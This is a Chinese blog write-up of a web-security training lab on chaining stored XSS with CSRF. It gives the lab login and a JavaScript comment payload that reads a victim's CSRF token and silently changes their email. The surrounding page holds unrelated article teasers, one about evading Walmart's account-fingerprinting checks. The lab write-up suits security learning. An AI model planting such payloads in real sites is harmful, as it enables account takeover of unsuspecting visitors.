Lab: Exploiting XSS to perform CSRF:利用XSS执行CSRF

最新推荐文章于 2024-11-04 16:31:12 发布
最新推荐文章于 2024-11-04 16:31:12 发布
阅读量207 收藏
点赞数
文章标签: 安全 xss 信息安全 csrf unity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793745
版权

靶场内容

本实验包含博客评论功能中的存储型 XSS漏洞。为解决实验室问题,利用该漏洞进行CSRF攻击,更改查看博文评论的人的邮箱。

您可以使用以下凭据登录自己的帐户: wiener:peter

漏洞解析

  • 这个漏洞告诉我们,可以利用CSRF令牌执行XSS漏洞
  • 所以我们要做的就是提取CSRF令牌:
  • 使用如下脚本:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
  • 这个脚本可以直接将任何执行者的脚本获取
  • 放在评论区里面执行XSS漏洞

image

Zeker62
关注
Probabilistic graphlet cut: Exploiting spatial structure cue for weakly supervised image segmentation
02-09
图元切割算法是本研究的核心,它利用前面步骤中得到的图元分布信息来执行图像分割。具体来说,该算法测量并切割一组特定的超像素,使得在同一个集合中的超像素尽可能地具有同质性。这里的同质性是指超像素在某些特征...
实战演练:利用XSS漏洞执行CSRF攻击
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-15 1166
该实验室在博客评论功能中包含存储的XSS漏洞。要解决实验室问题,可利用该漏洞执行CSRF攻击,并更改查看博客帖子评论的人的电子邮件地址。实验入口:进入网站,点击【ACCESS THE LAB】即可进入实验环境。
xss结合csrf实验】
一纸荒芜的博客
09-07 2005
通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例,漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。本实验由本地搭建的pikachu靶场做演示。 本期简单介绍了xss漏洞与csrf漏洞的配合使用。
通过XSS实现CSRF
止水
06-19 535
最近在学习xss攻击,但没有实际的操作,不会有深入的理解,所以我在seg的一个页面上,通过留言一段js脚本,实现xss,这里实际在提交评论后会打印我的cookie,当然只拿到我自己的cookie是不涉及什么安全问题的,但如果能拿到别人的cookie就可以进行冒充别人的登录操作了,也就是通过XSS实现了CSRF ...
XSS攻击与CSRF攻击
热门推荐
Dax1_的博客
04-08 1万+
XSS攻击 什么是XSS Cross-Site Scripting(跨站脚本攻击),简称XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如Cookie、SessionID等,进而危害数据安全 XSS的注入方法 简单来说,任何可以输入的地方都有可能引起XSS攻击,包括URL 在HTML内嵌的文本中,恶意内容以script标签形成注入 在内联的JavaScript中,拼接的数据突破了原本的限制(字符串,变量,方法名)等 在标
SegStereo: Exploiting Semantic Information for Disparity Estimation
04-13
Our method conducts semantic feature embedding and regularizes semantic cues as the loss term to improve learning disparity. Our unified model SegStereo employs semantic features from segmentation ...
VINCE: Exploiting Visible Light Sensing for Smartphone-based NFC Systems
02-09
We experimentally profile the impact of screen brightness levels and refresh rates of smartphones, and then use the results to guide the design of light intensity encoding scheme of VINCE. We adopt ...
xsser:跨站点“ Scripter”(又名XSSer)是一种自动框架,用于检测,利用和报告基于Web的应用程序中的XSS漏洞
05-07
网址: : 跨站点“脚本程序”(又名XSSer)是一种自动框架,用于检测,利用和报告基于Web的应用程序中的XSS漏洞。 它提供了几个选项来尝试绕过某些过滤器以及各种特殊的代码注入技术。 XSSer已预先安装了[> 1300 ...
Triplex transfer learning: Exploiting both shared and distinct concepts for text classification
02-10
在文本分类领域,转移学习是一种重要的机器学习方法,它主要关注当源域中的训练数据和目标域中的测试数据虽然在原始特征上具有相似的分布,但仍然存在差异时的学习情景。在转移学习的研究中,一些近期的文献指出,...
XSS攻击和CSRF攻击(浅显易懂)
laya1211的博客
09-15 428
1、XSS攻击(跨站脚本攻击)即往web页面(包含HTML和js文件)嵌入可执行的代码(js) 2、CSRF(跨站点请求伪造)攻击者伪造一个请求,诱使用户去触发这个请求,以此冒充用户身份向服务器发送伪造请求,并且该伪造请求被服务器成功执行
XSS攻击和CSRF攻击解析
楠姐的博客
09-08 615
1. XSS攻击 XSS攻击是跨站脚本攻击,会在浏览器中注入脚本,进行篡改网页,在用户使用浏览器时,就会获取用户的隐私数据的过程。 XSS分类 反射型 存储型 基于DOM型 a. 反射型:用户在网页中输入的内容经页面提交到服务器后,服务器没有对该数据进行存储到数据库,而是原封不动的反射回页面中,即用户输入什么内容,服务器就将其原封不动的显示到页面中,从而让用户立即被攻击。最常见的就是搜索引擎,当我们搜索一个无法搜索到的内容时,搜索引擎通常会直接在页面中提示,该内容无法搜索到,此时如果用户
XSS(Cross Site Scripting)跨站脚本攻击
Eason_LYC安全白帽子的成长博客
05-13 2990
XSS最为全面的知识点梳理总结,并有公开靶场配合知识点练习。含金量十成十
安全合规:沃尔玛自养号测评技术搭建要点
m0_61644681的博客
11-04 232
通过精细化的管理和运营,可以确保自养号体系的安全性和有效性,为卖家在沃尔玛平台上提升商品权重和销量提供有力支持。利用国外服务器在云端搭建安全终端,全面阻断沃尔玛平台对设备底层硬件参数的检测,确保账号操作无法被追踪至真实设备。为每个账号分配独立的虚拟环境,避免硬件参数的重复和关联。保持测评环境的更新与升级,确保硬件参数、IP地址、浏览器环境等信息的时效性和安全性。根据账号的活跃度和购买历史,灵活调整运营策略,确保账号行为的自然性。采用先进的指纹浏览器技术,结合隐私插件,为每个账号创建一个独立的浏览器环境。
PHP不良事件上报系统源码,医院安全不良事件管理系统,基于 vue2+element+ laravel框架开发
m0_67098612的博客
11-04 225
不良事件上报系统通过 “事前的人员知识培训管理和制度落地促进”、“事中的事件上报和跟进处理”、 以及 “事后的原因分析和工作持续优化”,结合预存上百套已正在使用的模板,帮助医院从对护理事件、药品事件、医疗器械事件、医院感染事件、输血事件、意外事件、职业暴露事件、后勤保障事件、信息安全事件、消防事件、工程事件、质量安全事件等各类不良事件进行管理的软件。(跌倒事件,坠床事件,压疮事件,管路滑脱事件,给药差错事件,烧伤/烫伤事件,输液反应事件,病人走失事件,消毒供应事件,其他事件)
ICT网络赛道安全考点知识总结4
m0_72765822的博客
11-04 461
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
安全软件开发框架(SSDF) 1.1:降低软件漏洞风险的建议》解读(四)
daopuyun的博客
11-04 278
安全软件开发框架SSDF是由美国国家标准与技术研究院发布的关于安全软件开发的一组实践,帮助开发组织减少发布的软件中的漏洞数量,减少利用未检测到或未解决的漏洞的潜在影响,从根本上解决漏洞防止再次发生。以上是安全软件开发框架(SSDF)1.1版本中的软件保护部分的全部内容,后面会继续为大家整理可靠软件生产部分和漏洞响应部分,欢迎大家继续关注。(谢绝转载,更多内容可查看我的主页)
冷钱包与热钱包的差异 | 加密货币存储的安全方案
tusik68的博客
11-01 1289
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
推荐FileLink数据跨网摆渡系统 — 安全、高效的数据传输解决方案
最新发布
weixin_44264342的博客
11-04 214
FileLink深知企业对于数据安全的关注,因此其系统采用了先进的加密技术,确保在跨网传输过程中,您的敏感信息始终处于保护之中。无论是文件传输还是在线共享,FileLink都通过多层次的安全机制和身份验证,确保只有授权用户能够访问文件,大大降低了数据泄露的风险。在选择跨网数据传输方案时,FileLink数据跨网摆渡系统凭借其卓越的安全性、高效性和用户友好的设计,成为企业的理想选择。无论您是需要处理敏感数据的金融机构,还是需要高效协作的科技公司,FileLink都能为您的数据传输提供强有力的支持。
网络打印机安全研究:Exploiting Network Printers
由于其图灵完备性,攻击者可以利用执行复杂的操作。PostScript是另一种重要的攻击目标,因为它是许多打印机的基础解释语言,可能存在安全漏洞。 3. 评估 作者对20款打印机模型进行了系统化评估,发现它们在安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值